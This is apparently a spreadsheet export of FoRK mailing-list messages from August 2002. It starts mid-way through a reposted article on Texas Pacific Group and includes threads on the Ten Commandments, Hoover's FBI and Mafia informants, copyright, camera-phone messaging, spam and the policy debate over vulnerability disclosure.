worked for Mr. Bass. They teamed up later that year with
Mr. Price, a veteran of GE Capital Capital and Bain &amp;
Company, a consulting firm, to form Texas Pacific. The three men have complementary skills, investment bankers
and other deal makers said. Mr. Bonderman is the master
strategist and Mr. Coulter is good at structuring deals and
the detailed management of the firm's purchases. Mr. Price
often recruits managers and advises on operational issues. "David is very much the optimist, very much the deal
maker," said Greg Brenneman, a former president of
Continental. "Jim is very much a counterbalance to David.
He will sit back and ask the tough questions. He will
approach investments a little bit more skeptically than
David does." By the end of the 1990's, Texas Pacific was well
established in deal making. It easily raised $4.5 billion
from pension funds and other investors in early 2000. To
celebrate their war chest, the firm's partners rented San
Francisco's City Hall and hired the B-52's to play at a
party. But as the stock market began to tumble, Texas Pacific
hesitated. For a 17-month stretch, the partners made no
deals. They checked out some of the biggest corporate
blowups, including Adelphia, Xerox and Global Crossing, but
stayed away, finding the prices and the quality of the
businesses untenable. Instead, Texas Pacific began to hastily exit some existing
investments, taking more than $2 billion in profits during
that stretch. "They started to cash out early in the cycle," said Mario
Giannini, chief executive of Hamilton Lane, a money
management firm, some of whose clients are Texas Pacific
investors. The good times of the late 1990's were not ideal for Texas
Pacific - it struggled to find downtrodden companies that
needed its help. But Texas Pacific did manage to spot a few diamonds in the
rough. It revived Oxford Health Plans, the health
maintenance organization that nearly collapsed in the
mid-1990's, almost doubling its money after bringing in new
managers and upgrading computer systems. In 1996, it made a
$280 million investment in Ducati Motor, the Italian
motorcycle maker, whose profits have since more than
quadrupled. But Texas Pacific also stumbled, usually when it bought at
the top of the market. Texas Pacific's $560 million
investment in the J. Crew Group, the clothing retailer, for
which it paid a steep price of 10 times cash flow in 1997,
has been a disappointment. So has its 1999 purchase of
Bally, the shoe maker, which has suffered from lower demand
for luxury goods. Texas Pacific also lost more than $100 million on Zilog, a
semiconductor company, and Favorite Brands, a candy maker,
both of which filed for bankruptcy. Some of these investments have taken a toll on the firm's
performance. Texas Pacific is still selling off holdings in
two investment funds it raised over the last decade. The
first fund, a $720 million portfolio raised in 1993 and
including investments made through March 1997, should
return more than 40 percent, according to one Texas Pacific
investor. But its second fund - $2.5 billion raised in 1997
- could return less than half that, this investor
estimated, since the firm had less time to take profits on
these investments before the stock market sank. But because Texas Pacific has not sold many of its holdings
in the second fund, profits on these investments could
rebound. It is hoping, for example, that with new
management in place, J. Crew will turn around as the
economy rebounds. In any case, one competitor said, "their
returns look pretty good when you consider that some other
funds won't return any capital" to investors. But with the weak economy throwing many companies into
trouble, Texas Pacific seems poised to repeat its earlier
success, the investor said. "They should do exceptionally
well," he said. Texas Pacific has a distinct style - if not formula. It
relies on talented, self-sufficient managers to restructure
troubled companies, preferring to remain hands-off, except
for surveillance from the boardroom. When necessary, it
replaces managers. Less than a year after Continental emerged from bankruptcy,
for example, Mr. Bonderman watched with frustration as his
old friend Robert R. Ferguson, the chief executive, led it
to the edge of another trip to bankruptcy court. Continental's board, where Mr. Bonderman was chairman, then
brought in Gordon M. Bethune, an executive at Boeing, and
in October 1994 he replaced Mr. Ferguson as chief
executive. Mr. Bethune quickly did a top-to-bottom overhaul
of the company and is now considered a great turnaround
artist of the industry. "The biggest conflict I've ever seen was with Bob
Ferguson," said Clark Onstad, a former general counsel for
the Federal Aviation Administration, in describing the
thinking of Mr. Bonderman, whom he has known since the 1982
Braniff bankruptcy. "He chose Bethune over his longtime
friend Ferguson because he thought Bethune would do a
better job." At America West, Texas Pacific initiated an even more
extensive management overhaul. This time, the charge was
led by Mr. Coulter and Mr. Schifter, both directors. W. Douglas Parker, the current chief executive, flew to Mr.
Coulter's home in San Francisco to interview for the job of
chief financial officer. They talked for hours, and Mr.
Parker said the two men quickly realized they had "somewhat
kindred spirits." The board replaced most senior managers at America West,
except William Franke, the chief executive, who stepped
down last September. His restructuring plan had made the
airline profitable a year and a half before it emerged from
bankruptcy in August 1994. Texas Pacific owns just 3 percent of America West, worth
about $33.7 million. But those are controlling shares, and
the group holds more than 50 percent of the votes. "These are not passive investors, nor am I," said Donald L.
Sturm, a Denver businessman who serves on Continental's
board with Mr. Bonderman and Mr. Price. "You're active.
Your money is at stake. Your reputation is at stake." After overseeing managers who worked successfully with
unions at Continental and America West, Texas Pacific has a
good reputation with labor. That was one reason US Airways
was interested in a Texas Pacific investment, said Chris
Chiames, a spokesman for the airline. Mr. Siegel wanted an investor who would "be as labor
friendly as possible," Mr. Chiames said. But US Airways can
still entertain other bids this fall, and Marvin Davis, the
billionaire investor from Los Angeles, has expressed
interest. Texas Pacific's investment in Burger King, made with
Goldman, Sachs and Bain Capital, was announced after two
years of discussions among Texas Pacific's partners and the
chain's franchisees - even before the company, which had
been owned by Diageo, the liquor company, was put up for
sale, said Julian Josephson, chairman of the National
Franchisee Association, which represents most Burger King
franchisees. "We liked what they had to say about the human component of
the businesses they buy," Mr. Josephson said. Many other
owners, he added, "are dismissive of labor." At Burger King, Texas Pacific will also be working with an
executive it knows. Burger King's chief executive is John
Dasburg, the former chief executive of Northwest Airlines,
who met Mr. Bonderman and his partners when Northwest
bought out their stake in Continental in 1998. Unlike most buyout firms, Texas Pacific remains enamored
with the technology industry, despite the failure of so
many start-ups the last two years. It has focused on the
semiconductor industry, which like the airline industry is
highly cyclical. So far, though, results have been mixed. The firm's 1996 acquisition of the Paradyne Corporation,
which makes equipment for high-speed Internet connections,
has been a huge success. Texas Pacific split it in two and
took both parts public in the late 1990's, selling most of
its stakes for 23 times its investment. But a much larger
investment, its $400 million acquisition of Zilog, the chip
maker, in 1998, was made just before the economic crisis in
Asia caused chip prices to plummet. Zilog filed for
bankruptcy last year. Texas Pacific is still hoping for a turnaround at a third
company, ON Semiconductor, which it acquired for $1.6
billion three years ago. It invested $100 million more last
year. Its latest gamble on the industry, the $6 deal for MEMC,
may prove the most lucrative. The cost of mailing the
payment to E.On, based in Dï¿½sseldorf, Germany, was actually
more than the acquisition, one executive close to the deal
said. Texas Pacific, and its partners in the deal, Trust Company
of the West and Leonard Green &amp; Partners, agreed to
guarantee a $150 million revolving line of credit. Texas
Pacific also assumed $900 million worth of debt, most of
which it swapped for more stock in the company. "They did a good job of timing the acquisition," said
Nabeel Gareeb, the company's chief executive, who noted
that in the last quarter MEMC reported its first profit
since the fourth quarter of 2000. But Texas Pacific's interest in airlines is clearly
sizable. Besides its involvement in Continental, America
West and US Airways, the company plans to buy Gate Gourmet,
the catering business of the bankrupt Swissair Group. Two years ago, Texas Pacific started a Web-based discount
ticket service called Hotwire. It put up most of the $75
million in seed money, then persuaded six airlines to
invest with it, said Karl Peterson, the chief executive.
Hotwire, instead of asking consumers to bid on tickets, as
Priceline does, shows the cheapest ticket on its Web site
but does not reveal the exact flight and travel time until
after the sale. The contraction of the new economy has undoubtedly hurt
Hotwire, which is privately owned. Mr. Peterson said that
the company was still unprofitable but that Texas Pacific
remains committed to it. Last spring, Mr. Peterson met Mr. Bonderman in Aspen to
talk about Hotwire and to go snowboarding. Mr. Bonderman
seemed perfectly willing to accompany Hotwire down the
steep Internet chute. But he does have his limits on risk,
Mr. Peterson discovered. Before going down the mountain,
Mr. Bonderman strapped on a helmet. ï¿½ http://www.nytimes.com/2002/08/25/business/yourmoney/25TEXA.html?ex=1031278887&amp;ei=1&amp;en=05fca479b8bcee6bHOW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http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Remember I didn't say it was necessarily a good source, just that it
looked good.The site was http://www.religioustolerance.org/chr_10c7.htmMy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fork@spamassassin.taint.org
&gt; Subject: Re: A biblical digression
&gt; 
&gt; On Sat, 24 Aug 2002 11:07:00 -0700, "John Hall"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jtauber@jtauber.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Sat, 24 Aug 2002 11:07:00 -0700, "John Hall" 
said:
&gt; Ran across a site which claimed to explain the original meaning of the
&gt; Ten Commandments.  It seems some of those meanings have evolved a bit,
&gt; too.By "meanings have evolved" do you [or they] mean that the Hebrew words
have changed meaning or that our understanding of the Hebrew words have
changed? Or do they posit a pre-Mosaic form of the laws that had
evolved by time of the Pentateuch?&gt; In particular, there was a claim that the commandment on stealing was
&gt; actually specifically about 'man stealing -- selling a free man into
&gt; slavery.This seems bogus to me. A quick check of the text indicates the the
Hebrew word in question is GANAV which elsewhere in the Pentateuch (eg
Gen 44.8) is used to mean steal silver and gold amongst other things.In July 1999, I made the following comment in response to a similar
claim about the "real" meaning of one of the ten commandments:"""
&gt; The translations since cause problems at each successive removeWe have the original language versions, though, so this is not an
issue.&gt; I'm sure most everyone is familiar with the argument that the meaning of the commandment
&gt; is 'thou shalt not murder' rather than 'kill,'This has nothing to do with successive translations. It is based on our
knowledge of the meaning of the Hebrew word "ratsach". Most modern
translations I've seen translate it "murder" but elsewhere the word is
used
of an animal killing a human (something for which most English speakers
wouldn't use the word "murder").
"""
- http://www.xent.com/FoRK-archive/july99/0163.htmlJames
-- 
  James Tauber
  jtauber@jtauber.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Thugs of South Boston and The Revenge of the Bandit Princess
The Geodesic Economy
Robert A. Hettinga
Sunday, August 25, 2002(BOSTON) When you think about it one way, the FBI/Winter Hill vs.
Patriarcha/Angiulo Cosa Nostra fight was just another race war
between thugs.Put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on.Every time some recreational drug was found to be addictive, or
harmful, or physically distasteful, or carcinogenic -- or, now,
apparently, fattening -- and then prohibited, exactly the same thing
happened to its markets that happened to alcohol during the Volstead
years. A *larger* market than before the prohibition. Hugely
lucrative profits for anyone with the moral stomach to violently
scale newly-legislated "barriers to competition" imposed on them by
the state. Increasingly violent attacks by the government on users of
those substances. And, finally, the ultimate in evil -- the kind of
evil this country actually fought wars to end -- increasingly
coercive axe-handle beatings, by our own government, of the sacred
liberty of the average, but now unavoidably-law-breaking, citizenry.As Ayn Rand cynically observed a long time ago, you don't need
government if nobody's breaking the law. In some twisted corollary to
Parkinson's Law, governments, to survive, *need* more people,
breaking more laws, or they can never justify the money they
confiscate at tax time.And, to bring us back to the point, David Friedman would probably
echo here his father Milton's famous observation that government
regulations only benefit the regulated sellers in a given market, and
never the consumer, much less the economy as a whole. Even,
*especially*, if those sellers are *breaking* the law, as they are in
the increasingly ubiquitous prohibition of risky behavior that our
government now imposes on us.
And there, absent the apparent grace of Mr. Hoover, went Mr. Salvati.In fact, Hayek himself, in "The Road to Serfdom", couldn't have
predicted any better the gory consequences of Hoover's blatant
imposition, "for our own good", of Vietnam-era statist power at the
neighborhood level. And, furthermore, *Stalin* couldn't have had
better "useful idiots" than Hoover did -- and neither, by an
absolutely literal extension, did Whitey Bulger after Hoover.Useful idiots on both sides of the congressional aisle. Idiots who
were eating out of Hoover's power-craven hand for the entire middle
of the 20th century -- and Whitey Bulger's hand, whether they knew it
or not, until the end of the millennium. A time, you'll notice, which
saw the increasingly steady imposition of "mob" violence, and market
control, from both state and illegal interests, way beyond the
imaginings of even the most power-mad, rum-running, stock-kiting,
movie-flopping, bureau-pumping, Nazi-appeasing Irish-Bostonian Little
Caesar. Or, as for that matter, his safely trust-funded, and now
strictly political, descendents.In terms of actual financial economics, think of what happened to Mr.
Salvati and the others, dead or alive, as a "transfer-price", in
human lives, of the inevitable consequence of MacNamara-style
Vietnam-era Keynesian "social-cost" input-output accounting at its
most despicable, and you can almost begin to fathom the atrocity that
was committed by Hoover, and his co-religionists in state economic
control, in the name of what really was, as you'll now agree, just a
race war between thugs up in Boston.
This shouldn't be a surprise, really. All race wars are at least
fought by thugs, though they're usually conceived elsewhere, and
endorsed, at the time, by all the "right" people, for all the "right"
reasons.As far as the FBI itself goes, remember Mancur Olson's observation
that a "prince" is just a stationary bandit.Though, given his penchant for women's clothing, for other men, and,
what's actually obscene, for violently hypocritical treatment of
people of his own affectional preference, I suppose we can call J.
Edgar Hoover a bandit "princess", instead."Bandit Queen", of course, would be a grievous insult to queens --
and real bandits -- everywhere.Cheers,
RAH
- ---------
http://www.nytimes.com/2002/08/25/national/25FBI.html?todaysheadlines=
&amp;pagewanted=print&amp;position=top
The New York Times
August 25, 2002
Hoover's F.B.I. and the Mafia: Case of Bad Bedfellows Grows By FOX
BUTTERFIELDBOSTON, Aug. 24 - It was March 1965, in the early days of J. Edgar
Hoover's war against the Mafia. F.B.I. agents, say Congressional
investigators, eavesdropped on a conversation in the headquarters of
New England's organized-crime boss, Raymond Patriarca.Two gangsters, Joseph Barboza and Vincent Flemmi, wanted Mr.
Patriarca's permission to kill a small-time hoodlum, Edward Deegan,
"as they were having a problem with him," according to an F.B.I. log
of the conversation. "Patriarca ultimately furnished this O.K.," the
F.B.I. reported, and three days later Mr. Deegan turned up dead in an
alley, shot six times.It was an extraordinary situation: The Federal Bureau of
Investigation had evidence ahead of time that two well-known
gangsters were planning a murder and that the head of the New England
Mafia was involved.But when indictments in the case were handed down in 1967, the real
killers - who also happened to be informers for the F.B.I. - were
left alone. Four other men were tried, convicted and sentenced to
death or life in prison for the murder, though they had had nothing
to do with it.One, Joseph Salvati, who spent 30 years in prison, filed notice with
the Justice Department last week that he planned to sue the F.B.I.
for $300 million for false imprisonment.His is the latest in a series of lawsuits against the F.B.I., the
Justice Department and some F.B.I. agents growing out of the tangled,
corrupt collaboration between gangsters and the F.B.I.'s Boston
office in its effort to bring down the mob.The lawsuits are based on evidence uncovered in the last five years
in a judicial hearing and a Justice Department inquiry. But some of
the most explosive evidence has only recently come to light,
including documents detailing conversation in which Mr. Patriarca
approved the murder. They were released as part of an investigation
by the House Committee on Government Reform, which has pressured the
department into turning over records about the F.B.I in Boston.The documents show that officials at F.B.I. headquarters, apparently
including Mr. Hoover, knew as long ago as 1965 that Boston agents
were employing killers and gang leaders as informers and were
protecting them from prosecution."J. Edgar Hoover crossed over the line and became a criminal
himself," said Vincent Garo, Mr. Salvati's lawyer. "He allowed a
witness to lie to put an innocent man in prison so he could protect
one of his informants."Mr. Barboza was a crucial witness at trial against Mr. Salvati and
may have implicated him because Mr. Salvati owed $400 to a loan shark
who worked for Mr. Barboza.Asked about the documents showing that Mr. Hoover knew of Mr.
Salvati's innocence when he was put on trial, Gail Marcinkiewicz, a
spokeswoman for the F.B.I. in Boston, declined to comment, citing the
pending litigation.A Justice Department task force is continuing to investigate
misconduct in the Boston office. In one of the first results of the
investigation, one retired agent, John J. Connolly, is awaiting
sentencing next month after being convicted of racketeering and
obstruction of justice for helping two other mob leaders who were
F.B.I. informers, James Bulger and Stephen Flemmi. Vincent and
Stephen Flemmi are brothers.The Government Reform Committee, led by Representative Dan Burton,
Republican of Indiana, has uncovered memorandums from the Boston
office to headquarters in Washington revealing the bureau's knowledge
that Vincent Flemmi and Mr. Barboza were involved in killing Mr.
Deegan. A memorandum a week after the killing described the crime,
including who fired the first shot.Then, on June 4, 1965, Mr. Hoover's office demanded to know what
progress was being made in developing Vincent Flemmi as an informer.In a reply five days later, the special agent in charge of the Boston
office said that Mr. Flemmi was in a hospital recovering from gunshot
wounds but because of his connections to Mr. Patriarca "potentially
could be an excellent informant."The agent also informed Mr. Hoover that Mr. Flemmi was known to have
killed seven men, "and, from all indications, he is going to continue
to commit murder." Nevertheless, the agent said, "the informant's
potential outweighs the risk involved."A Congressional investigator called the exchange chilling. "The most
frightening part is that after being warned about Flemmi's murders,
the director does not even respond," the investigator said. "There is
no message not to use a murderer as a government informant."The origin of the corruption scandal was public and political
pressure on Mr. Hoover to move more forcefully against the growing
power of the Mafia, which he had largely ignored. In Boston, F.B.I.
agents recruited Mr. Barboza and Mr. Flemmi and developed close ties
to a rival criminal organization, the Winter Hill Gang, led by Mr.
Bulger.Both sides got what they wanted, according to the investigations and
the trial of Mr. Connolly. The F.B.I. got information that eventually
helped destroy the Patriarca and Angiulo families, which controlled
organized crime in New England. Mr. Bulger's gang was able to take
over the rackets in Boston, sell drugs and even commit murder while
the F.B.I. looked the other way.One reason the F.B.I. may not have used its information about Mr.
Patriarca's involvement in the Deegan murder, Congressional
investigators say, is that it came from an illegal listening device
in his Providence, R.I., headquarters. The F.B.I. agent who
transcribed the conversation made it appear that the information was
coming from unnamed informants, to disguise the use of the device,
the investigators say.Mr. Salvati, a former truck driver, now 69, had his sentence commuted
in 1997 by Gov. William F. Weld. Last year, while he was still on
parole, his murder conviction was dismissed by a Massachusetts state
judge after the Justice Department task force made public documents
suggesting his innocence.Two of the other wrongly convicted men died in prison. Their
survivors have joined the fourth man, Peter Limone, in a $375 million
lawsuit against the Justice Department. Mr. Limone was sentenced to
die in the electric chair. His life was spared only when
Massachusetts outlawed the death penalty in 1974.Mr. Salvati lives in a modest apartment in Boston's North End with
his wife, Marie, who visited him in prison every week during those 30
years. Each week Mr. Salvati sent her a romantic card, which she put
on the television set. It was, Mr. Garo said, all they had of each
other.-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPWmB2sPxH8jf3ohaEQL9qgCgxHq0ee06UEsNv8u8wgvmjf9K7S4An3Rb
3srsGomWjNDwIaKoEHOfNHpI
=OELD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</si>
  <si>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 xml:space="preserve">
&gt;&gt;From what I read, the rest of it looked quite good so it does seem odd
they would make the seemingly incorrect blanket statement about the
Hebrew for "steal". One possibility is that the page is a summary of
information gathered from a variety of sources of varying qualities.JamesOn Sun, 25 Aug 2002 10:17:46 -0700, "John Hall" 
said:
&gt; Remember I didn't say it was necessarily a good source, just that it
&gt; looked good.
&gt; 
&gt; The site was http://www.religioustolerance.org/chr_10c7.htm
&gt; 
&gt; My memory of what they said was accurate.  I do not have the competence
&gt; to defend what they said.  James Tauber's response indicates a breadth
&gt; of knowledge I can't match.
-- 
  James Tauber
  jtauber@jtauber.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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Help?...Ross...http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Hire a really talented skywriter to doodle nudie pics in the sky and see
if they figure out what to charge you with. Exactly how far into the sky
does the border of your local district reach?&gt;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side!http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On 26 Aug 2002, RossO wrote:--]Does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--]Not sure about MG, though I know pretty much everything he penned got into
print at one time or another.  SA needs to do what National Geo did and
put out thier back issues on CD.Post MG in the 80's there were the colums by A K Dewdney that I dug a
bunch put into a book  called Turing Omnibus and then there is , of
course, all the goodens put out by Dougy Hoffstadler.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>R. A. Hettinga wrote:
&gt; And then there was the one from Prairie Home Companion:
&gt; 
&gt; Q. Why is a viola larger than a violin?
&gt; A. It  just looks that way because a violin player's head is bigger.Suggested variation:Q. Why does the concertmaster play a smaller violin
    than the rest of the violinists?
A. It just looks that way because his head is bigger.&amp;c&amp;c&amp;c
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Adam L. Beberg wrote:
&gt; Fair use needs to be clarified a bitThat's an understatement!!!&gt; How else do i ever have hope of finding a job working for someone
&gt; that makes things people are supposed to ... *drumroll* pay for.Well, you could damn well get a fucking better attitude.
I practically handed you a job the other week and you
pissed all over me. I'm done helping you. You have joined
a very exclusive club that up to now has only had my sister
as a member.- Joehttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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never.Geesh.- Jimhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Mon, 26 Aug 2002, Jim Whitehead wrote:
--]a sledgehammer)? We hadn't done anything unusual to the toilet in the recent
--]past -- just normal use. I've *never* heard of this happening to anyone I
--]know. The guts, yeah, they fail all the time. But the storage bowl -- never.
--]Do you have any Tesla nuts inthe hood? Them hooligans and thier beams..http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>At 01:12 AM 8/24/02 -0700, Adam L. Beberg wrote:&gt;If the creator didnt say you could have it without paying, it's theft, so
&gt;simple, hell that's even in all the major holy books.In which world are we talking about?  That may be true for the first sale, 
but once something is out in the world, the "creator" loses control... If I 
buy a chair you built, and then decide to give it away to my neighbor, by 
you're definition, he just stole from you.&gt;Fair use needs to be clarified a bit and then I hope they start locking
&gt;people up. How else do i ever have hope of finding a job working for someone
&gt;that makes things people are supposed to ... *drumroll* pay for.Why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bookstore".Access to free stuff often helps to sell other stuff.  Just because you 
(and the entertainment industry, it seems) can't be creative enough to come 
up with a business model to leverage free stuff into paid stuff... don't 
take it out on the rest of us.Mikehttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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show.Which isn't to say that the entertainment industry won't fall victim to
its own stupidity, but their ability to do arbitrary and capricious
price manipulation with impunity is going to make it a slow decline.-James Rogers
 jamesr@best.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Actually, this is common. I've known a couple of
people who have suffered this. Believe it or not,
you were lucky. You were home, rather than on
vacation, and so you didn't have the intake line
flowing onto the floor for two weeks.Now, don't you feel better?_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I think that this and other articles confuse Socialism with 
Bureaucracy.  Libertarianism as implemented in North America is not 
exactly the shining pinnacle of economic efficiency.Just try starting a telephone company in the US or (even worse) 
Canada.  It can take a year or more to get the blessing of our own 
"Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
socialist leaning Canada, Industry Canada and the CRTC).Yet,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down.So.. tell me again.. how are we better off?-Ian.
On Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:&gt;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fork@spamassassin.taint.org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http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>thx for the thoughts gentlemen (yes as someone said i use terms loosely) -more than cool ---&gt;quality: snobs only care about mpixels. this is about communications.  the
general public cares about speed not quality.  how is akamai doing these
days? not to mention any other QOS businesses that come to mind.implementation: point about hooking to usb, wires, etc. AGREE 100%. these
implementations are super clunky, attachable camera needs to be integrated a
la nokia model.  basically useless until better handsets are released i
think.adoption: ian brought up the 'fax' problem.  brilliant thing is, this is far
more personal than faxes so can be justified more easily and marketed in
family packs etc. but yes, the usual rules apply as MMS phones have network
efx.content: who cares about content?  that no one can think of 'useful' content
is always the business persons mistake. the content is the users
communications.  its anything and everything.  avg person could easily send
half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
cares if content is trivial in nature. picture speaks a thousand words.display: why are dig camera displays better than cell phones?  does anyone
know who makes these small displays and what the trends are around them?misc ramblings: i suppose you skeptical forkers would have said the same
thing about '1 hour photo' processing.  trivial, who needs it, i get better
resultion elswhere.  and yet, it had great decentralizing impact - the plant
had to be downsized and pushed to the retail operation - the digital camera,
and finally the integrated digital camera phone brings this cycle of
decentralization in photography to a logical conclusion (which will put the
photo giants to bed) and change the world in a meaningful way.  also, SMS
didn't take off because its easy, it took off because it costs less.  its
greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
traffic over others because of its ratio of cost to bandwidth.  in reality,
SMS cannibilizes the voice rev's they bought their networks to handle.ps:  it is relatively amusing that one 'low resolution' complaint dropped
just after Joe watched a CARTOON on his television..You're right. Or at least, I don't. I saw an advert for it on TV last
night (can't miss Futurama :-) and I thought, "boy, that's dumb."
If I wanted to share pictures with someone, I'd email them to them,
where they could see them on a 1024x or 1600x display, instead ofrob
-----Original Message-----
From: Eugen Leitl [mailto:eugen@leitl.org]
Sent: Monday, August 19, 2002 1:34 AM
To: Rob Shavell
Cc: fork@spamassassin.taint.org
Subject: Re: sprint delivers the next big thing??
On Sun, 18 Aug 2002, Rob Shavell wrote:&gt; down in the tech world than mobile visual communications.. and yet no one
&gt; seems to give much of a damn that right now that 2 persons can take photos
&gt; and share them instantly across space.  this is one of the biggest - andThe word "trivial" comes to mind.&gt; last - fundamental changes in human communications.  will be as big as the
&gt; browser.Remote realtime streaming video is neat, but sharing pictures? You invoke
big words rather readily.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>right Mike,i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getting.my premise is that the world will change in dramatic and unexpected ways
once there are a billion 'eye's' which can instantly share what they see
amongst each other.  that doesn't mean that people will stop talking on
their phones, or that people will spend more time w/images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time'.rgds,
rob
-----Original Message-----
From: Mike Masnick [mailto:mike@techdirt.com]
Sent: Tuesday, August 20, 2002 11:58 PM
To: Rob Shavell
Cc: fork@spamassassin.taint.org
Subject: RE: sprint delivers the next big thing??
Not to keep harping on this, but...At 11:36 PM 8/20/02 -0700, Rob Shavell wrote:&gt;content: who cares about content?  that no one can think of 'useful'
content
&gt;is always the business persons mistake. the content is the users
&gt;communications.  its anything and everything.  avg person could easily send
&gt;half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
&gt;cares if content is trivial in nature. picture speaks a thousand words.This does nothing to answer my question.  I *do* care about content.  Hell,
if I could be convinced that people would send stupid pics back and forth
all day, I'd have a different opinion of this.  I just am not convinced
that they will (stupid or not).While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something?I don't buy it.For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across.&gt;misc ramblings: i suppose you skeptical forkers would have said the same
&gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better
&gt;resultion elswhere.  and yet, it had great decentralizing impact - the
plant
&gt;had to be downsized and pushed to the retail operation - the digital
camera,
&gt;and finally the integrated digital camera phone brings this cycle of
&gt;decentralization in photography to a logical conclusion (which will put the
&gt;photo giants to bed) and change the world in a meaningful way.  also, SMS
&gt;didn't take off because its easy, it took off because it costs less.  its
&gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
&gt;traffic over others because of its ratio of cost to bandwidth.  in reality,
&gt;SMS cannibilizes the voice rev's they bought their networks to handle.Again, this is the same argument my colleague made (along with "you just
don't understand kids today, and they'll run with this").  I wasn't saying
that MMS wouldn't take off because it wasn't high quality or that it wasn't
easy.  I was saying that I couldn't see why people would use it in a way
that "changed the face of communications".I'm looking for the compelling reason (even if it's a stupid one) why
people would want to do this.  Sure, if they integrate cameras into the
phone, and the quality improves (even only marginally) I can certainly see
people taking pictures with their cameras and occasionally sending them to
other people.  But, mostly, I don't see what the benefit is to this over
sending them to someone's email address, or putting together an online (or
offline) photoalbum.I don't think 1 hour photos are trivial.  People want to see their own pics
right away, and the quality is plenty good enough for snapshots.  That's
one of the main reasons why digital cameras are catching on.  The instant
view part.  I'm guessing your argument is that people not only want
"instant view", but also "instant show".  Which is what this service
offers.  I'm not convinced that most people want "instant show".  I think
people like to package their pictures and show them.  That's why people put
together fancy albums, and sit there and force you to go through them while
they explain every picture.  Sure, occasionally "instant show" is nice, but
it's just "nice" on occasion.  I still can't see how it becomes a integral
messaging method.What's the specific benefit of taking a picture and immediately sending it
from one phone to another?  There has to be *some* benefit, even if it's
silly if people are going to flock to it.I'm searching... no one has given me a straight answer yet.The *only* really intriguing idea I've heard about things like MMS lately
are Dan Gillmor's assertion that one day in the near future some news event
will happen, and a bunch of people will snap pictures with their mobile
phones, from all different angles, and those photos tell the real story of
what happened - before the press even gets there.Willing to be proven wrong,
MikePS If the wireless carriers continue to price these services as stupidly as
they currently are, then MMS is *never* going to catch on.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Justin Mason writes:
&gt;So IMO it's the corruption that's the problem; and corruption !=
&gt;regulation, and corruption != socialism.   Also, over-population is really
&gt;a symptom of that.Without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t>
  </si>
  <si>
    <t>--------------------------------------------------------------------------What is MIME?MIME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/rfc/rfc1521.txtAnother source of information is the Internet news group "comp.mail.mime",
which includes a periodic posting of a "Frequently Asked Questions" list.--------------------------------------------------------------------------
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Thu, 22 Aug 2002, Lucas Gonze wrote:&gt;
&gt; Political mail (the snail kind) doesn't bother me.  I like it a lot of the
&gt; time, because as crap as it is at least it's not the kind of info you get
&gt; on TV.  Particularly for small time local politics, it's the best way to
&gt; get information.Except that thanks to the magic of spam, it's usually some else's locale&gt; but what matters is that mail is speech, and political email has to be as
&gt; well protected as any other political speech.  Spam is *the* tool for
&gt; dissident news, since the face that it's unsolicited means that recipients
&gt; can't be blamed for being on a mailing list.A terrible argument. There are better technical solutions to privacy
protection than sending a copy of the same message to everyone on the
Internet, so the recipients can't be blamed for reading it.Wait till phone spam is as cheap to send as email spam...Danhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Hi Kragen,   This is an interesting analysis.  I think that there are a couple
of nits I might pick (for example, I don't expect that the market will
be well developed with highest bidders for while), I think that the
most important issue, which is that end users won't be able to fix
their systems, is almost passed over.  I know that you know this, and
you allude to it, but your essay is getting passed around, so you
might want to add to it bits about the sysadmin and others.   There's one other point which you don't make, which I think is very
important, which is that research into defining and addressing classes
of vulnerabilities can't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wouldn't have Stackguard, ITS4, Nissus, or snort.  And the security
admin's job would be a lot harder.Adam
On Thu, Aug 22, 2002 at 08:42:12AM +0200, Eugen Leitl wrote:
| -- 
| -- Eugen* Leitl leitl
| ______________________________________________________________
| ICBMTO: N48 04'14.8'' E11 36'41.2'' http://eugen.leitl.org
| 83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
| 
| 
| ---------- Forwarded message ----------
| Date: Thu, 22 Aug 2002 00:24:54 -0400 (EDT)
| From: Kragen Sitaker 
| To: fork@spamassassin.taint.org
| Subject: the underground software vulnerability marketplace and its hazards
| 
| On August 7th, an entity known as "iDEFENSE" sent out an announcement,
| which is appended to this email.  Briefly, "iDEFENSE", which bills
| itself as "a global security intelligence company", is offering cash
| for information about security vulnerabilities in computer software
| that are not publicly known, especially if you promise not to tell
| anyone else.
| 
| If this kind of secret traffic is allowed to continue, it will pose a
| very serious threat to our computer communications infrastructure.
| 
| At the moment, the dominant paradigm for computer security research
| known as "full disclosure"; people who discover security
| vulnerabilities in software tell the vendor about them, and a short
| while later --- after the vendor has had a chance to fix the problem
| --- they publish the information, including code to exploit the
| vulnerability, if possible.  
| 
| This method has proven far superior to the old paradigm established by
